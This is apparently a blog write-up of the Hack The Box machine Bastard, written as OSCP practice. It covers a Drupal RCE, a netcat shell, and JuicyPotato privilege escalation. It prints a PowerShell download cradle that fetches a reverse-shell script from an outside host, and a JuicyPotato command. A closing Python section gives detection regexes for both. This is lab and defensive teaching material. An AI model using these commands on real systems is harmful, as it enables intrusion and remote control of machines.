OSCP PREPARATIONS – HTB Bastard

Bastard is a retired Hack The Box machine running Windows. The goal is to obtain the user and root flags by exploiting its vulnerabilities.
We start with an nmap scan to get to know the target machine.
Classic scan

Full port scan

As a result of the port scan, the following ports are open: 80/tcp http (IIS httpd 7.5), 135/tcp msrpc (Windows RPC) and 49154/tcp msrpc (Windows RPC).
We enumerate port 80.

We found a Drupal CMS with an admin login form. We tried default passwords without success. We then checked the output given by Nmap and saw the version number in /CHANGELOG.txt.

It was 7.54, so let’s see whether there is a known vulnerability for that version.
Searchsploit finds:

There is an RCE vulnerability; we prefer the unauthenticated variant because we still have not found any credentials.
We try to exploit this vulnerability from our own machine.

We edited this line as needed.
But when we tried to run the exploit we got an error.

Let’s search for exploits on GitHub.

We downloaded this one and used it.

Having seen its usage, let’s run it against the target.

Here we were able to run the whoami command.
Now let’s try to place nc on the target and run it to get an interactive shell.
We have placed nc on the target.

Then we ran nc.exe and it gave us a shell.

Here we obtained the user flag, but we cannot access the Administrator folder.

Next we enumerate the local system to find a way to the root flag.

We see that JuicyPotato can be used here.
We transfer JuicyPotato.exe and Shell.bat to the target machine.
Shell.bat contains:
powershell "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.19:8000/Invoke-PowerShellTcp.ps1')"

We write it and transfer it to the target.

Then run JuicyPotato.exe
.\JuicyPotato.exe -t * -p shell.bat -l 5555 -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}

We run it and the shell comes back on port 4723, on which we are listening with nc.

Now we get the root flag.
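As an added defender-side example (not part of the original write-up), the following Python flags process command lines that match the two patterns used above: the PowerShell download cradle in Shell.bat and the JuicyPotato invocation. The sample command lines are constructed, and the rule names and regular expressions are my own assumptions, not a published detection rule.

```python
import re
from typing import Dict, List

# Constructed sample command lines: the two commands from this write-up
# plus two benign lines. They are not real logs from the target.
SAMPLE_COMMAND_LINES = [
    'powershell "IEX (New-Object Net.WebClient).DownloadString('
    "'http://10.10.14.19:8000/Invoke-PowerShellTcp.ps1')\"",
    r".\JuicyPotato.exe -t * -p shell.bat -l 5555 "
    "-c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}",
    r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    r"C:\Windows\System32\notepad.exe C:\Users\Public\notes.txt",
]

# Rule 1: a download cradle is an in-memory eval (IEX / Invoke-Expression)
# fed by a web download inside the same command line.
_EVAL = re.compile(r"\b(IEX|Invoke-Expression)\b", re.IGNORECASE)
_DOWNLOAD = re.compile(
    r"(Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|iwr)\b",
    re.IGNORECASE,
)

# Rule 2: a JuicyPotato-style invocation carries a CLSID via -c together with
# the -l listener port and the -p program to run, whatever the binary is named.
_CLSID_ARG = re.compile(r"-c\s*\{[0-9A-F-]{36}\}", re.IGNORECASE)
_LISTEN_ARG = re.compile(r"-l\s+\d{1,5}\b")
_PROGRAM_ARG = re.compile(r"-p\s+\S+")


def classify(cmdline: str) -> List[str]:
    """Return the names of every rule that matches one command line."""
    hits: List[str] = []
    if _EVAL.search(cmdline) and _DOWNLOAD.search(cmdline):
        hits.append("powershell_download_cradle")
    if (_CLSID_ARG.search(cmdline) and _LISTEN_ARG.search(cmdline)
            and _PROGRAM_ARG.search(cmdline)):
        hits.append("juicypotato_invocation")
    return hits


def scan(cmdlines: List[str]) -> Dict[str, List[str]]:
    """Map each flagged command line to the rules it tripped; benign lines are dropped."""
    return {c: classify(c) for c in cmdlines if classify(c)}


if __name__ == "__main__":
    for line, rules in scan(SAMPLE_COMMAND_LINES).items():
        print(", ".join(rules), "<-", line)
```

Both rules key on argument shape rather than file names, so renaming JuicyPotato.exe or Shell.bat does not evade them; a renamed binary with a different argument syntax would.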

Comments

  1. Pingback: OSCP Prep – HTB all Windows Machine – Muhammed AYGÜN
